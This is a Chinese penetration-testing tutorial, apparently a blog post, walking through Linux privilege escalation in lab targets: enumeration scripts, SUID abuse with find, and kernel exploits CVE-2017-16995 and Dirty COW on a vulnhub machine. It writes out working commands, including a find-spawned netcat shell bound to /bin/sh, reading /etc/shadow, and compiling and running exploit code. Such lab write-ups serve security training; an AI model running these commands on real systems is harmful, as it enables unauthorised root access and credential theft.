基础19-权限提升之Linux提权【上】

Aspark

​内容目录
案例1-linux好用的4个信息收集脚本演示
案例2-linux提权之SUID配合脚本提权演示
案例3-linux提权之内核漏洞提权演示
        3.1 内核漏洞本地提权-CVE-2017-16995
        3.2 内核漏洞本地提权-webshell脏牛提权

案例1-linux好用的4个信息收集脚本演示
两个信息收集：
LinEnumlinuxprivchecker两个漏洞探针：
linux-exploit-suggester linux-exploit-suggester2需要解释：信息收集有什么用哦？漏洞探针又有什么用哦？
在windows提权时，我们需要使用systeminfo命令查询系统信息，而在linux中，我们就需要脚本来帮助我们更快更好的收集信息。
1.LinEnum项目使用
只需要使用webshell权限将linenum项目上传到对方服务器。
一般提权后上传的文件路径上传到tmp目录下，因为这个目录一般是有可读可写可执行的权限。
如果运行不了，给他赋值一个可执行权限。

​

编辑

​

编辑

2.linuxprivchecker(py2脚本)
对方服务器要装有py2环境，不然搞不来。

​

编辑

3.linux-exploit-suggester使用

​

编辑

将系统信息以及将可能存在的漏洞及漏洞地址也给出来了，非常贴心。

4.linux-exploit-suggester2
二版本使用的是pl脚本，显示内容比第一版简洁，误报少。

​

编辑

案例2-linux提权之SUID配合脚本提权演示
SUID-Set User ID
跨越用户权限执行。

​

编辑
这里我们用跑普通用户再去运行 linux-exploit-suggester2时，会使用root用户对它执行。
漏洞成因：chmod u+s 给予了 suid u-s 删除了 suid
提权过程:探针是否有 SUID(手工或脚本)-特定 SUID 利用-利用吃瓜-GG
尝试查找具有root权限的SUID的文件。
第一步：探针是否存在suid提权的可能，手工或者脚本
使用冰蝎，这里可以使用反弹shell，反弹到我们的服务器的msf端。

​

编辑

成功接收到。
查看当前权限。

​

编辑

www权限，web权限。
第二步，使用信息收集脚本，查看是否存在SUID提权的可能。
我们这里将linux-exploit-suggester脚本上传到对方服务器上。

​

编辑

​

编辑


成功上传。

​

编辑

执行成功后找到SUID file栏，查看是否存在如下信息。
NmapVimfindBashMoreLessNanocp（然而我换了两个系统，装了vim也找不到。）
由于我这样没有SUID提权可利用点，所以我使用find提权返回的还是www权限

​

编辑

这里用迪哥成功的图进行下面的演示。
第三步，找到了find可提权项，执行下面命令。
命令：​​​​​​​
touch xiaodifind xiaodi -exec whoami ;

​

编辑

返回了root权限。
接下来利用find反弹shell；
find xiaodi -exec netcat -lvp 5555 -e /bin/sh ;
由于find继承的是root权限，所以反弹的shell也是root权限。
服务器端进行监听，然后执行命令，查看 /etc/shadow​​​​​​​
命令:netcat 192.168.1.189 5555idcat /etc/shadow

---

​

编辑

成功提权。
​​​​​​​
参考文章:https://pentestlab.blog/2017/09/25/suid-executables【非常全，利用全部都在文章中有写】​​​​​​​不利用脚本使用手工探测SUID命令find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ;

---

案例3-linux提权之内核漏洞提权演示
1
3.1 内核漏洞本地提权-CVE-2017-16995

Ubuntu 16.04漏洞复现【墨者靶场】
提权过程：连接-获取可利用漏洞-下载或上传 EXP-编译 EXP-给权限执行-GG

​

编辑

第一步，建立连接。

​

编辑

第二步，信息收集，使用我们当时用过的linux-exploit-suggester2，上传到对方tmp目录下[因为这个目标一般有读可写可执行权限]

​

编辑

​

编辑

执行后给出了四个可能存在的漏洞。
【如果实战中我们就要一个个去尝试，因为这里是靶场，所以我们直接利用cve-2017-16695进行利用】
第三步：上传我们找到的利用exp，继续上传到tmp目录下，这里需要进行编译，再运行生成的文件。​​​​​​​
命令：gcc 45010.c -o 45010 #编译刚45010.cchmod +x 45010 #给编译好的45010赋值./45010 #运行

​

编辑

1
3.2 内核漏洞本地提权-webshell脏牛提权

这里使用的是vulnhub靶场。
地址：https://www.vulnhub.com/entry/lampiao-1,249

​

编辑

第一步：需要密码，我们要先找到靶场的ip
nmap扫描当前虚拟机网段，找到了靶场的ip

​

编辑

再次扫描ip所有端口，发现1898端口

​

编辑

​

编辑

通过识别CMS，我们这里知道他是Drupal搭建的，这个cms是有很多漏洞的。

​

编辑
第二步：漏洞利用，这里直接使用msf，找到2018这个漏洞模块，进行利用。

​

编辑

利用成功。
第三步:提权准备，上传一下我们的信息收集脚本，运行看看。

​

编辑

这里我们利用脚本测试出来的可能漏洞进行测试，
这里我用了两个linux-exploit-suggester，第一版和第二版
第二版比较尴尬，没有判断出CVE-2016-5195(脏牛)

​

编辑

所以第二版虽然精简，但是可能有时候不上特别全面，建议实际渗透中两个都用，宁可
错杀一千，也不放过一个。

​

编辑

这里我们使用第一版扫描出来的进行后续利用。
第四步:下载利用exp，上传到靶机服务器，编译运行。
同样，也可以利用wget命令在靶机是直接下载
​​​​​​​EXP:https://github.com/mzet-/linux-exploit-suggesterg++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40837.cpp -lutil

​

编辑

编译完成。
命令：(使用py作为一个伪终端)python -c 'import pty; pty.spawn("/bin/bash")'

​

编辑

运行

​

编辑

我们再切换用户，su root输入密码

​

编辑

获得root权限，提权成功。
​